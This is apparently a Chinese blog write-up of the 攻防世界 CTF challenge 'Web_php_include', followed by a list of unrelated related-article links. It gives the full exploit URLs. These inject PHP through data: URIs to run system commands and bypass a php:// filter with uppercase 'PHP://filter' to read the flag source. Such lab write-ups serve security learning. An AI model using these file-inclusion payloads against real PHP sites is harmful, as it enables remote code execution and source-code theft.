CTF-攻防世界-Web_php_include(PHP文件包含)
题目
从给出的代码来看,参数名是page,并且过滤了php协议。正好之前学过文件包含漏洞,看能不能学以致用。。。
解题过程
输入:http://111.198.29.45:54883/index.php?page=data:text/plain,%3C?php%20phpinfo();?%3E
返回phpinfo页面,并找到了apache日志的路径:
尝试访问一下日志文件,如果能访问的话,就可以像https://www.cnblogs.com/sallyzhang/p/12221089.html里那样,利用日志来注入
输入:http://111.198.29.45:54883/index.php?page=日志路径/日志文件名
错误日志和访问日志都没法访问到,应该是木有访问权限,这条路不通。
接下来使用PHP伪协议,php://已经被过滤了(hmmm......这其实是不是在侧面提醒咱要用协议来解题啊 >_<,抱歉我才反应过来...)
输入:http://111.198.29.45:54883/index.php?page=data:text/plain,<?php system(ls);?>
返回了一个叫fl4g.....php的可疑文件
输入:http://111.198.29.45:54883/index.php?page=data:text/plain,<?php system(cat fl4gisisish3r3.php);?>
返回:500(再用base64编码试了下,还是返回500)
换成这个: http://111.198.29.45:54883/index.php?page=PHP://filter/read=convert.base64-encode/resource=fl4gisisish3r3.php (代码过滤了php://,但没有过滤PHP:// ^_^)
读取成功,解码得到flag。
相关文章
- [MySQL] mysql 5.5和 5.6 timestamp default 默认值CURRENT_TIMESTAMP问题
- [前端系列] jquery的on事件实现hover函数效果
- [MySQL] mysql优化实例-delete数据不会减少数据文件大小
- [MySQL] mysql优化实例-为join表关联字段增加索引
- 侧边悬浮在线客服咨询按钮-在线客服按钮代码实现
- [前端系列] 解决默认样式-用户代理样式表问题
- [MySQL系列] mysql find_in_set搜索以逗号分隔的字符串
- [前端系列] 解决el-table导致TypeError: this.$el.querySelectorAll is not a function
- [MySQL] group by 分组并进行组内排序取得最新一条
- [PHP系列] popim 私有化独立部署即时通讯im系统搭建过程
- [前端系列]vue3修改模板变量间隔符
- 在线客服系统代码安装 (附移动版APP下载)
- [PHP] 装饰器模式-结构型设计模式
- [PHP] 数据映射器模式-结构型设计模式
- [PHP] 组合模式-结构型设计模式
- [前端系列] 解决Invalid prop: custom validator check failed for prop "type"
- [PHP] 桥接模式-结构型设计模式
- [PHP] 使用curl扩展POST或者PUT时数据不全和连接中断的排查
- [TCP] TCP连接中的五个常见flag标志位
- [PHP] php使用curl扩展时的两个超时设置